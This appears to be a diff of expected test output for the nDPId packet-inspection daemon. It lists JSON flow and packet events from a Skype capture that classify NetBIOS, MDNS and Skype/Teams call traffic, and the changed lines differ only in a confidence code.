00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1431970643670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970643670,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABOJN8AAEAR0RTAqAFcwKgB\/9JCAIkAOpbmnKMBEAABAAAAAAAAIEVNRkZFREVCRkRDTkVKRU5FQkVEQ0FDQUNBQ0FDQUFBAAAgAAE="} 
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1431970643673,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1431970643673,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAADKHC4AAEAR2YPAqAEiwKgB\/wCKAIoAtt1hEQJFdcCoASIAAACgAAAgRU1GRkVERUJGREVORUJFREVDRVBFUEVMRkFGQ0VQQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAcAIAAHRFEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQRzRQAA"} 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1431970643676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":1431970643676,"pkt":"PBXCt3IO0NQSxnP1CABFAADUAABAAEARtqXAqAEBwKgBIgCKAIoAwKSxEAoqncCoAQEAigCqAAAgRUJFTUVKRURFRkVIRUJGRUVGQ0FDQUNBQ0FDQUNBQUEAIEVNRkZFREVCRkRFTkVCRURFQ0VQRVBFTEZBRkNFUEFBAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAFYAAwABAAEAAgAhAFxNQUlMU0xPVFxCUk9XU0UACgFzRQAAQUxJQ0VHQVRFAA=="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643964,"flow_last_seen":1431970643964,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970643964,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1431970643964,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":96,"pkt_l4_len":42,"thread_ts_msec":1431970643964,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NACoR\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAqSjYAAAAAAAEAAAAAAAAKTHVjYXMtaU1hYwVsb2NhbAAAHIAB"} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643964,"flow_last_seen":1431970643964,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970643964,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643964,"flow_last_seen":1431970643964,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970643964,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970644120,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1431970644120,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1431970644120,"pkt":"PBXCt3IOxCwDBkn+CABFAACAhzsAAP8RkTHAqAFc4AAA+xTpFOkAbM4wAACEAAAAAAEAAAACCkx1Y2FzLWlNYWMFbG9jYWwAAByAAQAAAHgAEP6AAAAAAAAAxiwD\/\/4GSf7ADAABgAEAAAB4AATAqAFcwAwAHIABAAAAeAAQ\/oAAAAAAAADGLAP\/\/gZJ\/g=="} -00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970644120,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970644120,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1431970644121,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"thread_ts_msec":1431970644121,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NAGwR\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsYIEAAIQAAAAAAQAAAAIKTHVjYXMtaU1hYwVsb2NhbAAAHIABAAAAeAAQ\/oAAAAAAAADGLAP\/\/gZJ\/sAMAAGAAQAAAHgABMCoAVzADAAcgAEAAAB4ABD+gAAAAAAAAMYsA\/\/+Bkn+"} -00704{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431970644121,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": 
{"answer":"lucas-imac.local"}} +00704{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431970644121,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970644777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1431970644777,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970644777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+iz0AAEARV8bAqAEinTc4qjLdnE8AKqlOercCgeG1zG2vbzPj0KjKJlzB46QihppHpHZWBMh9hdX\/8Q=="} 
-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970644777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970644777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA533AAAEARH43AqAEib91KDzLdnFoAJRqBerkCLcYyzYQBZ1UUv9afmdL8U47Y0EMKk9GOcm8="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8IE0AAEAReEHAqAEiQTffITLdnEIAKKkPersC6xhZmoz4NcwgQN8Oq77mdsG6aJAJEzSI01rU6ec="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7MzsAAEARLhjAqAEiQAQXkTLdnFsAJ6Pner0C2KbUw2DxbMk3cWJigGAv5JrHPRhWYHrZrKFH\/Q=="} 
-00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+dlAAAEARIrjAqAEinTeCpTLdnFwAKmyyer8CyymJmKIvjgybbxj4QUGrEeWW\/O+vVrSV+3Rj4Yjh8w=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6yaYAAEARHe\/AqAEinTg0GzLdnFkAJhz6esECVdgpKZUPSYYd3u6m4rCVVtMoL0MGJKJcpPJg"} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7AJsAAEAR\/k3AqAEib91KIjLdnFsAJ+15esMC4VlNRvu3By\/5s5rGR+P6LgoKPKR7nd4t4OfW1A=="} 
